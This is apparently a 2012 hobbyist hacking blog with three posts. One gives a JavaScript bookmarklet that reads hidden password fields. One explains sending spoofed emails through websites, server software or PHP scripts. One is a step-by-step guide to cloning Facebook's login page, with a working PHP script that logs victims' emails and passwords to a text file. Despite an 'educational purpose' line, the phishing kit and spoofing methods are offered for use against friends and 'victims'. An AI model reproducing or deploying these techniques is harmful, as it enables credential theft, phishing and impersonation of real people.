Thursday, June 7, 2012

hello frndzzz:

  • today i m gona tell u the trick to reviel the pass word hidden behind the astric(*)
  • wat u wana do is that just follow the instructions and experience the learning......
  • we make use of a java script to paerform this task.
  • do try it nd make ur frndzzz astonished...

so here we go...


JavaScript to Reveal Hidden Passwords in Asterisk (Stars)

Reveal Password Asterisk

  • To use this JavaScript, open your web browser, open the webpage for which the password is hidden in asterisks, copy and paste the following code in the address bar.



javascript: var p=r(); function r(){var g=0;var x=false;var x=z(document.forms);g=g+1;var w=window.frames;for(var k=0;k<w.length;k++) {var x = ((x) || (z(w[k].document.forms)));g=g+1;}if (!x) alert('Password not found in ' + g + ' forms');}function z(f){var b=false;for(var i=0;i<f.length;i++) {var e=f[i].elements;for(var j=0;j<e.length;j++) {if (h(e[j])) {b=true}}}return b;}function h(ej){var s='';if (ej.type=='password'){s=ej.value;if (s!=''){prompt('Password found ', s)}else{alert('Password is blank')}return true;}}



nd now u find a DILOG BOX like this shown below showing the password 

 Asterisk Star Password



hope u oll enjoy doing it........

@bhishek...

Wednesday, June 6, 2012


How to send fake Mails: Email Attack


Hi frndzzzz!!!!!!!!
Attacking sombodys email generally means steallling his or her passwod.......
so here r some ways to do so
learn and play prank with ur frnds nd if u face any proble u can contact me maaa          maaaaaa  mail iz  







abhizzzworld48@gmail.com
  or contact me frm maa profile






SOME COMMON TYPES O F EMAIL ATTACKS ARE:

  •           Sending fake Mails.
  •        Phishing
  •        Desktop Phishing
  •        Cookies stealing
  •        Key loggers etc.


FAKE MAILS: INTRO

Fake mails are those mails which are not sent by the ID from which it appears to sent.
Fake mails or Email spoofing is actually forgery of the Header and design of the Email Headers which makes it appear to be original like an actual source.



METHOD OF SENDING FAKE MAILS:



  •      Using Many Websites
  •      Using Server software
  •      Using Script


SENDING FAKE EMAILS USING WEBSITES/LIST OF WEBSITES FOR SENDING FAKE MAILS.


There are lots of website available on Internet that you can use to send fake mails from.
These Websites are Listed Below.




Yes the site is Embei's Fake Mailer




This site looks like this.
Here you can give any Name, Email ID, Subject, Text.
Name- This is the option from which the mail is to be send.
Email-ID- Here you can give any Email-ID as per your choice.
To- This is important as here you have to give the recipient's Email address.
Subject- Anything as per your choice.
Text- Anything as want to write and send it to the victim.
And many other option as your per your requirement.



SENDING FAKE MAILS USING SERVER SOFTWARE

Many software apps like Post Cast Server, surgemail server, Hmail server,can help you to configure the Mail setting for sending the fake mails.
These apps make changes in the SMTP protocol of the computer and ISPs. By making this small change you can send the fake mails directly from your computer

HOW TO SEND FAKE MAILS USING SCRIPTS

Most of the web programming language like PHP, JSP, .Net, AJAX have in built features which can be use to edit the headers and make it fake. The parts of harder that are usually modified are From: To: Subject:




It’s very easy. Just Open a Notepad file.. Write down the PHP code on it from Image above.
Save it as filename.PHP
Your Fake mail script is ready to use. Just upload it on any PHP hosting site and you are ready to send fake mails.




hope u guyzzz learned smthing!!!!!!!!!

@bhishek

Friday, June 1, 2012

Creating a Facebook phishing page with PHP


Creating a Facebook phishing page with PHP

Note: This guide is only for educational purpose.

I will create and show you how to create a Facebook phishing page that will log (store) users email id and passwords, and victim wont even notice. This is just a PHP Form which stores users input into a hidden text file.



Step 1.
Go to Facebook.com and save the entire webpage. (File Menu > Save page as (Complete) )
Save the html page as login.php
Step 2.
Open login.php with Dreamweaver. And go to CODE view in Dreamweaver.
Find word action (CTRL + F)
Replace www.YOURHOST.com with your web servers address, you can get free web server or buy your own. Search on google: free web hosting
What we are doing is when any user enters his/her email & password in login fields we will store them into a PHP file. I’m assuming that you understand HTML-PHP Forms.
Step 3.
Create phish.php page.
1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
$handle = fopen("password.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Step 4.
Create an empty text file password.txt
When you upload all files on your server, make sure to CHMOD 666 (File permission) to password.txt file.
Thats all!
explore ur self in the era of defacement with me..............

          hope u learned something :)



@abhishek